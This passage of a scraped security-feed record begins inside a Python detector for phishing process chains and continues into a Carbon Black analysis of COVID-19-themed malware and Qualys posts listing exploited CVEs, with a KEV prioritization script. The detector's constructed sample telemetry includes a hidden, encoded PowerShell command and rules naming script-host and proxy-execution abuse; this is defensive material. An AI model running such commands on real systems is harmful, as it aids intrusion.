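        seen.add(pid)
        chain.append(procs[pid])
        pid = procs[pid].ppid
    return chain

def detect_chains(procs):
    """Return (pid, rule, detail) for every process that matches a phishing chain."""
    alerts = []
    for p in procs.values():
        me = basename(p.image)
        anc = ancestors(procs, p.pid)
        anc_names = [basename(a.image) for a in anc]
        if me in SCRIPT_HOSTS and any(a in OFFICE for a in anc_names):
            detail = "script host descended from an Office application"
            if HIDDEN_PS.search(p.cmdline):
                detail += " (hidden window / encoded command)"
            alerts.append((p.pid, "office->script-host", detail))
        if me in {"cscript.exe", "wscript.exe"} and ".vbs" in p.cmdline.lower():
            alerts.append((p.pid, "vbs-launch", "script host running a .vbs file"))
        if me in COMPILERS and any(a in SCRIPT_HOSTS for a in anc_names):
            alerts.append((p.pid, "compile-after-delivery", f"{me} under a script host"))
        if me in PROXY_EXEC and anc and "\\users\\" in anc[0].image.lower():
            alerts.append((p.pid, "proxy-exec-from-user-path",
                           f"{me} launched by {basename(anc[0].image)}"))
        if any("masquerading" in r for r in triage_attachment(me)):
            alerts.append((p.pid, "masquerading-name", me))
    return alerts

# constructed telemetry modelled on the chains in the text (not real captures)
SAMPLE_LOG = [
    r'pid=100 ppid=1 image="C:\Windows\explorer.exe" cmd="explorer.exe"',
    r'pid=200 ppid=100 image="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" cmd="WINWORD.EXE /n COVID-19.INFO.37842702.doc"',
    r'pid=210 ppid=200 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell.exe -NoP -W Hidden -Enc SQBFAFgA"',
    r'pid=220 ppid=210 image="C:\Windows\System32\cscript.exe" cmd="cscript.exe C:\Users\u\AppData\Local\Temp\upd.vbs"',
    r'pid=230 ppid=210 image="C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" cmd="csc.exe /noconfig /out:C:\Users\u\AppData\Local\Temp\a.dll"',
    r'pid=240 ppid=230 image="C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" cmd="cvtres.exe /NOLOGO"',
    r'pid=300 ppid=100 image="C:\Users\u\Downloads\AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_pdf.exe" cmd="DOCUMENT_pdf.exe"',
    r'pid=310 ppid=300 image="C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" cmd="RegAsm.exe"',
    r'pid=400 ppid=100 image="C:\Windows\System32\notepad.exe" cmd="notepad.exe"',
]

if __name__ == "__main__":
    for pid, rule, detail in detect_chains(parse_log(SAMPLE_LOG)):
        print(f"pid={pid:<4} {rule:<28} {detail}")
```

The process rules deliberately key on ancestry rather than the direct parent only: in the .doc chain above, cscript.exe is a grandchild of WINWORD.EXE (via PowerShell), and a parent-only rule would miss it. The masquerading check reuses the attachment triage on the running image name, so the same double-extension logic fires on both the mail gateway and the endpoint.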
\n\n### [Powershell (T1086):](<https://attack.mitre.org/techniques/T1086/>)\n\nWhen a particular MS Word document attachment named \u201c**CORONA VIRUS REMEDY ISREAL.doc**\u201d is opened, it executes an obfuscated command in a hidden PowerShell window. This in turn invokes two signed Microsoft binaries, **csc.exe** and **cvtres.exe**, which are characteristic of the defense evasion technique [compile after delivery (T1500)](<https://attack.mitre.org/techniques/T1500/>): the payload arrives as source and is compiled on the victim with legitimate Windows binaries. This behaviour is common in commodity malware and highly effective. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/11-Powershell-snippet.png>) \n\n\n**Figure 11: Snippet of obfuscated Powershell command**\n\n### [Dynamic Data Exchange (T1173):](<https://attack.mitre.org/techniques/T1173/>)\n\nMalicious MS Office documents still successfully exploit unpatched versions of MS Office. The CVEs most often seen are [CVE-2012-0158](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027#mscomctlocx-rce-vulnerability---cve-2012-0158>), [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0798>). Strictly, none of these is a DDE flaw: CVE-2012-0158 is memory corruption in the MSCOMCTL.OCX ActiveX controls, and CVE-2017-11882 and CVE-2018-0798 are memory corruption in the Equation Editor (EQNEDT32.EXE). DDE abuse (T1173) is different in kind: it misuses a legitimate Office feature, works against fully patched installs, and needs no exploit at all. \n\nIn a recent Coronavirus themed MS Word document attachment, MS Word is the target for [exploitation for client execution (T1203)](<https://attack.mitre.org/techniques/T1203/>): the document triggers the MS Equation Editor, and the exploit then runs its payload through [signed binary proxy execution (T1218)](<https://attack.mitre.org/techniques/T1218/>). This sample was found to overlap with the APT41 (also referred to as WINNTI) threat group, which has traditionally been an APT actor based in China. 
The VMware Carbon Black TAU team is still investigating this particular threat.\n\n## **More on Masquerading**\n\nMasquerading has been highlighted so far in relation to malicious phishing email attachments. Third-party software is not exempt. There is evidence that the following categories of software are being weaponised, or imitated, in order to target potential victims. \n\n### Fake VPN clients/installers:\n\nA recent [report](<https://www.bleepingcomputer.com/news/security/azorult-malware-infects-victims-via-fake-protonvpn-installer/>) highlights that, as people globally adapt to working from home for the foreseeable future, a growing amount of malware is being disguised as VPN clients and installers. The example discussed in the report delivers the AZORult malware via a fake ProtonVPN client; after execution the victim machine becomes part of the AZORult botnet. \n\n### Remote meeting software:\n\nTAU is currently monitoring for the appearance of weaponized or fake remote meeting software, and anticipates an increase over the coming weeks as more people around the world rely on remote working. \n\n### Mobile apps:\n\nAvast has [released](<https://www.apklab.io/covid19>) a repository for researchers and defenders tracking the growing number of Coronavirus themed apps aimed at Android users. In a recent [report](<https://www.domaintools.com/resources/blog/covidlock-update-coronavirus-ransomware>), a fake Android Coronavirus app was found to be delivering ransomware. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/12-fake-mobile-apps.png>) \n\n\n**Figure 12: Snippet showing potential malicious and fake apps**\n\n### Fake Coronavirus maps:\n\nIn a recently published report, a fake Coronavirus map was discovered which silently steals passwords, crypto wallets and other sensitive information. 
\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/13-Coronavirus-map.png>)\n\n**Figure 13: Malicious fake Coronavirus map**\n\n## **Ransomware**\n\n[Data encrypted for impact (T1486)](<https://attack.mitre.org/techniques/T1486/>) is observed with a new family of ransomware known as Coronavirus, which was recently [reported](<https://www.bleepingcomputer.com/news/security/new-coronavirus-ransomware-acts-as-cover-for-kpot-infostealer/>). TAU has observed an upward trend in ransomware for some time, but sadly there has never been a better time for threat actors to create and distribute it. Ransomware is an ongoing threat which TAU watches very closely. A full write-up of this new ransomware campaign will be published soon. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/14-Coronavirus-ransomware.png>) \n\n\n**Figure 14: Coronavirus ransomware message**\n\n## **Summary**\n\nThe threats that we are seeing that leverage the COVID-19 pandemic are varied, but primarily familiar. The key point is that uncertainty and thirst for knowledge about the global pandemic, coupled with the shift to remote working, create new opportunities for exploitation. It may seem obvious, but masquerading and user execution are the two behaviors seen across most of the recently observed threats. While some public lists of IOCs do exist, the current global situation could result in a significant increase in cyber attacks, and the volume of IOCs may shortly become unmanageable. Understanding the behaviors and leveraging the MITRE ATT&CK Framework will help to detect and mitigate such threats. While Coronavirus themed malware includes a variety of different threats, many of the techniques are the same ones seen in regular commodity malware. As ever, a layered approach should be taken to reduce the risk of such threats. 
Defenders should be extra vigilant in not only staying up to date with future Coronavirus related threats, but also advising their family, friends and colleagues of such threats. \n\n## **Indicators of Compromise (IOC\u2019s)**\n\nPlease refer to the VMware Carbon Black TAU [Github](<https://github.com/carbonblack/tau-tools/tree/master/threat_hunting/IOCs/COVID-19%20Post%20IOCs>) page for a list of IOC\u2019s.\n\nThe post [Technical Analysis: Hackers Leveraging COVID-19 Pandemic to Launch Phishing Attacks, Fake Apps/Maps, Trojans, Backdoors, Cryptominers, Botnets & Ransomware](<https://www.carbonblack.com/2020/03/19/technical-analysis-hackers-leveraging-covid-19-pandemic-to-launch-phishing-attacks-trojans-backdoors-cryptominers-botnets-ransomware/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "edition": 2, "cvss3": {}, "published": "2020-03-19T20:48:06", "type": "carbonblack", "title": "Technical Analysis: Hackers Leveraging COVID-19 Pandemic to Launch Phishing Attacks, Fake Apps/Maps, Trojans, Backdoors, Cryptominers, Botnets & Ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0798"], "modified": "2020-03-19T20:48:06", "id": "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756", "href": "https://www.carbonblack.com/2020/03/19/technical-analysis-hackers-leveraging-covid-19-pandemic-to-launch-phishing-attacks-trojans-backdoors-cryptominers-botnets-ransomware/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], 
"qualysblog": [{"lastseen": "2019-12-27T19:32:53", "description": "[A recent report](<https://www.darkreading.com/threat-intelligence/20-vulnerabilities-to-prioritize-patching-before-2020/d/d-id/1336691>) identified 19+ vulnerabilities that should be mitigated by the end of 2019. These are among the vulnerabilities most frequently exploited by Advanced Persistent Threat (APT) actors from all parts of the world.\n\nThe list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into which assets and vulnerabilities in your organization are at risk.\n\n**No.** | **CVE** | **Products Affected by CVE** | **CVSS Score (NVD)** | **Examples of Threat Actors** \n---|---|---|---|--- \n**1** | CVE-2017-11882 | Microsoft Office | 7.8 | APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia) \n**2** | CVE-2018-8174 | Microsoft Windows | 7.5 | Silent Group (Russia), Dark Hotel APT (North Korea) \n**3** | CVE-2017-0199 | Microsoft Office, Windows | 7.8 | APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Gorgon Group (Pakistan), Gaza Cybergang (Iran) \n**4** | CVE-2018-4878 | Adobe Flash Player, Red Hat Enterprise Linux | 9.8 | APT37 (North Korea), Lazarus Group (North Korea) \n**5** | CVE-2017-10271 | Oracle WebLogic Server | 7.5 | Rocke Gang (Chinese Cybercrime) \n**6** | CVE-2019-0708 | Microsoft Windows | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**7** | CVE-2017-5638 | Apache Struts | 10 | Lazarus Group (North Korea) \n**8** | CVE-2017-5715 | ARM, Intel | 5.6 | Unknown \n**9** | CVE-2017-8759 | Microsoft .net Framework | 7.8 | APT40 (China), Cobalt Group (Spain, Ukraine), APT10 (China) \n**10** | CVE-2018-20250 | RARLAB WinRAR | 7.8 | APT32 
(Vietnam), APT33 (Iran), APT-C-27 (Iran), Lazarus Group (North Korea), MuddyWater APT (Iran) \n**11** | CVE-2018-7600 | Debian, Drupal | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru), Sea Turtle (Iran) \n**12** | CVE-2018-10561 | DASAN Networks | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**13** | CVE-2012-0158 | Microsoft | N/A; 9.3* | APT28 (Russia), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Lotus Blossom (China), Goblin Panda (China), Gorgon Group (Pakistan), APT40 (China) \n**14** | CVE-2017-8570 | Microsoft Office | 7.8 | APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT23 (China) \n**15** | CVE-2018-0802 | Microsoft Office | 7.8 | Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Cloud Atlas (Unknown), Cobalt Group (Spain, Ukraine), Goblin Panda (China), APT23 (China), APT27 (China), Rancor Group (China), Temp.Trident (China) \n**16** | CVE-2017-0143 | Microsoft SMB | 8.1 | APT3 (China), Calypso (China) \n**17** | CVE-2018-12130 | Fedora | 5.6 | Iron Tiger (China), APT3 (China), Calypso (China) \n**18** | CVE-2019-2725 | Oracle WebLogic Server | 9.8 | Panda (China) \n**19** | CVE-2019-3396 | Atlassian Confluence | 9.8 | APT41 (China), Rocke Gang (Chinese Cybercrime) \n \n* according to [cvedetails.com](<http://cvedetails.com/>)\n\n### Detecting the Top 19 CVEs\n\nQualys has detections (QIDs) for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that cover authenticated and remotely detected vulnerabilities supported by Qualys scanners and [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).\n\nTo return a list of all impacted hosts, use the following QQL query within the VM Dashboard:\n \n \n vulnerabilities.vulnerability.cveIds:[CVE-2017-11882, CVE-2018-8174, CVE-2017-0199, CVE-2018-4878, CVE-2017-10271, CVE-2019-0708, CVE-2017-5638, CVE-2017-5715, CVE-2017-8759, CVE-2018-20250, CVE-2018-7600, CVE-2018-10561, CVE-2012-0158, CVE-2017-8570, CVE-2018-0802, 
CVE-2017-0143, CVE-2018-12130, CVE-2019-2725, CVE-2019-3396]\n\nYou can [import the following dashboard to track all 19 CVEs](<https://discussions.qualys.com/docs/DOC-7032>) as shown in the template below:\n\n[](<https://discussions.qualys.com/docs/DOC-7032>)\n\n### Alerts\n\nThe Qualys Cloud Platform enables you to continuously monitor for vulnerabilities and misconfigurations and get alerted for your most critical assets.\n\nSee how to set up [notifications for new and updated QIDs](<https://www.qualys.com/docs/version/8.21/qualys-vulnerability-notification.pdf>).\n\n### Tracking Per-Year Environment Impact and Remediation\n\nThe Qualys visualization team has included a Per-Year Environment Insight View Dashboard for easy tracking and remediation. This dashboard has been included in release 2.42 and can be found within the dashboard templates library. It will automatically show your systems whether scanned internally, externally or on remote mobile computers with the groundbreaking Qualys Cloud Agent.\n\n\n\nThis Per-Year Environment Insight View Dashboard will display data per year based on First Found date, followed by Vulnerability Status, Severity, Compliance, Real-Time Threat Intelligence (RTI)s from [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>), and Vulnerability Published Dates, allowing for an easy glance across your environment.\n\n\n\n \n\n### Get Started Now\n\nTo start detecting and remediating these vulnerabilities now, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/>).\n\nVisit the [Qualys Community](<https://community.qualys.com/docs/DOC-6785>) to download other dashboards created by your SMEs and Product Management team and import them into your subscription for further data insights.", "cvss3": {}, "published": "2019-12-27T18:01:22", "type": "qualysblog", "title": "Top 19+ Vulnerability CVEs in Santa\u2019s Dashboard Tracking", "bulletinFamily": "blog", "cvss2": {}, "cvelist": 
["CVE-2012-0158", "CVE-2017-0143", "CVE-2017-0199", "CVE-2017-10271", "CVE-2017-11882", "CVE-2017-5638", "CVE-2017-5715", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-10561", "CVE-2018-12130", "CVE-2018-20250", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-8174", "CVE-2019-0708", "CVE-2019-2725", "CVE-2019-3396"], "modified": "2019-12-27T18:01:22", "id": "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "href": "https://blog.qualys.com/technology/2019/12/27/top-19-vulnerability-cves-in-santas-dashboard-tracking", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. 
It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team continuously maps the catalog\u2019s CVEs to QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase and tags them with the RTI field \u201cCISA Exploited\u201d. This mapping is kept current because CISA regularly adds new CVEs to the catalog through its feeds.\n\nDirective 22-01 urges all organizations to reduce their exposure to cyberattacks by prioritizing the remediation of the listed vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. 
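Operationally, the directive comes down to a join between scan findings and the catalog: each catalog entry carries a due date, and anything found in the environment whose due date has passed is out of compliance. The Python below is an added example, not Qualys' or CISA's code. It loads a constructed slice of the KEV JSON feed (the top-level "vulnerabilities" list with cveID, vendorProject, product, dateAdded and dueDate keys is an assumption about the published layout; verify it against the live file, and note the dates here are made up), joins constructed scan findings against it, ranks them with overdue items first, and emits the CVE-list query in the same form as the VM dashboard query shown in the earlier Qualys post on this page.

```python
import json
from datetime import date

# Constructed slice of the KEV JSON feed: real CVE ids, made-up dates.
# The key names are an assumption about the feed layout for this example.
KEV_SAMPLE = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "vulnerabilities": [
        {"cveID": "CVE-2012-0158", "vendorProject": "Microsoft", "product": "MSCOMCTL.OCX",
         "dateAdded": "2021-11-03", "dueDate": "2022-05-03"},
        {"cveID": "CVE-2017-11882", "vendorProject": "Microsoft", "product": "Office",
         "dateAdded": "2021-11-03", "dueDate": "2022-02-10"},
        {"cveID": "CVE-2021-44228", "vendorProject": "Apache", "product": "Log4j2",
         "dateAdded": "2021-12-10", "dueDate": "2022-03-01"},
    ],
})

# Constructed scan findings as (asset, CVE). CVE-2021-3449 is absent from the sample catalog.
FINDINGS = [
    ("fileserver01", "CVE-2012-0158"),
    ("workstation17", "CVE-2017-11882"),
    ("workstation17", "CVE-2012-0158"),
    ("app-gw02", "CVE-2021-44228"),
    ("app-gw02", "CVE-2021-3449"),
]

REPORT_DATE = date(2022, 2, 23)   # "today" for the example, the post's own date


def load_kev(text):
    """Index the catalog by CVE id; a KeyError here means the feed layout changed."""
    data = json.loads(text)
    return {v["cveID"]: v for v in data["vulnerabilities"]}


def classify(days_left, window=14):
    """Bucket a finding by how far its KEV due date is from today."""
    if days_left < 0:
        return "OVERDUE"
    return "due-soon" if days_left <= window else "scheduled"


def prioritize(findings, kev, today):
    """Join findings with the catalog; overdue first, nearest due date next, non-KEV last."""
    rows = []
    for asset, cve in findings:
        entry = kev.get(cve)
        if entry is None:
            rows.append({"asset": asset, "cve": cve, "in_kev": False,
                         "due": None, "days_left": None, "status": "not-in-KEV"})
            continue
        due = date.fromisoformat(entry["dueDate"])
        days_left = (due - today).days
        rows.append({"asset": asset, "cve": cve, "in_kev": True, "due": due,
                     "days_left": days_left, "status": classify(days_left),
                     "product": f'{entry["vendorProject"]} {entry["product"]}'})
    rows.sort(key=lambda r: (not r["in_kev"], r["days_left"] if r["in_kev"] else 0, r["asset"]))
    return rows


def summary(rows):
    """Count findings per status, e.g. {"OVERDUE": 1, "due-soon": 1, ...}."""
    out = {}
    for r in rows:
        out[r["status"]] = out.get(r["status"], 0) + 1
    return out


def qql_cve_query(kev):
    """Build the dashboard query in the cveIds:[...] form shown earlier on this page."""
    return "vulnerabilities.vulnerability.cveIds:[" + ", ".join(sorted(kev)) + "]"


if __name__ == "__main__":
    kev = load_kev(KEV_SAMPLE)
    rows = prioritize(FINDINGS, kev, REPORT_DATE)
    for r in rows:
        print(f'{r["status"]:<10} {r["asset"]:<14} {r["cve"]:<15} due={r["due"]}')
    print(summary(rows))
    print(qql_cve_query(kev))
```

Findings that are not in the catalog are kept rather than dropped, because a KEV-driven workflow is a prioritization layer on top of normal vulnerability management, not a replacement for it; the sort order just pushes them below everything with a due date.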
The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. 
With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities within the remediation timelines set in the [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities in the CISA catalog are not currently supported out-of-the-box by Qualys. To remediate those, Qualys provides the ability to deploy custom patches, so customers can patch the remaining CVEs on their list as well.\n\nCustomers can copy the following query into the Patch Management app to help meet the directive\u2019s aggressive remediation timelines. 
Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-
15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these 
vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? 
